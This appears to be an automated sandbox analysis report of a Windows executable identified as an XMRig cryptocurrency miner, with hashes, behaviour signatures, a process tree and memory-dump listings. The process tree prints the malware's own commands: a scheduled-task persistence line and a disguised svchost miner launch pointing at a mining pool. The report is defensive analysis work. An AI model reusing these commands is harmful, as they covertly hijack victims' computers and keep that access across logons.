Overview

overview

10

Static

static

3

1759934f36...32.exe

windows7-x64

10

1759934f36...32.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    156s
  • max time network
    171s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/12/2023, 11:39

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    1759934f36d5b85357c3b319f35b0432.exe

  • Size

    110KB

  • MD5

    1759934f36d5b85357c3b319f35b0432

  • SHA1

    f634a290bcfbc526f0d80868c8acc82b8f7bbf2e

  • SHA256

    315cd7ebf75f6804614a07de69c8f5c6e9f6ef9eaeaf86b8efbeaca69c48d641

  • SHA512

    1a16656380ec06f6f1a64e53fbdda09dcf15587cf2d4464eb92f3089a90205c605971ee02b9cbc48d95f9417769eb2a0217e4639e0131420522ec31f9152d152

  • SSDEEP

    1536:UpXwmYTU4I1KLmY0BRxoOXBZVFfxUlYlI7oDF/WH:OwmyU4+xoOXRFfTF/G

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 10 IoCs
    miner
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Cryptocurrency Miner

    Makes network request to known mining pool URL.

    miner
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\1759934f36d5b85357c3b319f35b0432.exe
    "C:\Users\Admin\AppData\Local\Temp\1759934f36d5b85357c3b319f35b0432.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4200
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2068
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:1376
    • C:\Users\Admin\AppData\Local\Temp\services64.exe
      "C:\Users\Admin\AppData\Local\Temp\services64.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2892
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1652
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:2556
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:796
      • C:\Windows\System32\svchost.exe
        C:\Windows/System32\svchost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=60 --cinit-idle-wait=5 --cinit-idle-cpu=60
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4844

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\services64.exe
          Filesize

          110KB

          MD5

          1759934f36d5b85357c3b319f35b0432

          SHA1

          f634a290bcfbc526f0d80868c8acc82b8f7bbf2e

          SHA256

          315cd7ebf75f6804614a07de69c8f5c6e9f6ef9eaeaf86b8efbeaca69c48d641

          SHA512

          1a16656380ec06f6f1a64e53fbdda09dcf15587cf2d4464eb92f3089a90205c605971ee02b9cbc48d95f9417769eb2a0217e4639e0131420522ec31f9152d152

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          Filesize

          7KB

          MD5

          9493e3d01cce271cf1ffeb0dd0e252fb

          SHA1

          4cfe3799e73d7117a0f0c85f451602e5f5168ad3

          SHA256

          10da2245652c5674010ad225d9f1e448918838c44916700dff558ef03e068de2

          SHA512

          2a7a22a167c2cc5c3045cb3065efda938974f1c95b5f481b11d5aed21a37a81f39b2f5b6aea1fbf06925dd18127fa380d4f020dd5d76c347acee8a9b9a8a0794

          Download Submit

        • memory/796-54-0x000000001C190000-0x000000001C1A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/796-49-0x00007FF911DA0000-0x00007FF912861000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/796-37-0x000000001C190000-0x000000001C1A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/796-36-0x00007FF911DA0000-0x00007FF912861000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/796-34-0x0000000000540000-0x0000000000546000-memory.dmp

          Filesize

          24KB

          Download

        • memory/2892-38-0x00007FF911DA0000-0x00007FF912861000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2892-46-0x00007FF911DA0000-0x00007FF912861000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2892-18-0x00007FF911DA0000-0x00007FF912861000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2892-40-0x0000000002B10000-0x0000000002B20000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2892-19-0x0000000002B10000-0x0000000002B20000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4200-5-0x0000000002C30000-0x0000000002C3A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/4200-35-0x00007FF911DA0000-0x00007FF912861000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4200-4-0x0000000000BC0000-0x0000000000BD2000-memory.dmp

          Filesize

          72KB

          Download

        • memory/4200-3-0x0000000000B90000-0x0000000000B9E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/4200-0-0x00000000001C0000-0x00000000001E0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/4200-1-0x00007FF911DA0000-0x00007FF912861000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4200-2-0x000000001BEB0000-0x000000001BEC0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4844-44-0x0000000140000000-0x0000000140786000-memory.dmp

          Filesize

          7.5MB

          Download

        • memory/4844-47-0x0000000140000000-0x0000000140786000-memory.dmp

          Filesize

          7.5MB

          Download

        • memory/4844-45-0x0000018998AC0000-0x0000018998AE0000-memory.dmp

          Filesize

          128KB

          Download

        • memory/4844-43-0x0000000140000000-0x0000000140786000-memory.dmp

          Filesize

          7.5MB

          Download

        • memory/4844-48-0x0000000140000000-0x0000000140786000-memory.dmp

          Filesize

          7.5MB

          Download

        • memory/4844-50-0x0000000140000000-0x0000000140786000-memory.dmp

          Filesize

          7.5MB

          Download

        • memory/4844-51-0x0000000140000000-0x0000000140786000-memory.dmp

          Filesize

          7.5MB

          Download

        • memory/4844-52-0x0000000140000000-0x0000000140786000-memory.dmp

          Filesize

          7.5MB

          Download

        • memory/4844-53-0x0000000140000000-0x0000000140786000-memory.dmp

          Filesize

          7.5MB

          Download

        • memory/4844-41-0x0000000140000000-0x0000000140786000-memory.dmp

          Filesize

          7.5MB

          Download

        • memory/4844-55-0x0000000140000000-0x0000000140786000-memory.dmp

          Filesize

          7.5MB

          Download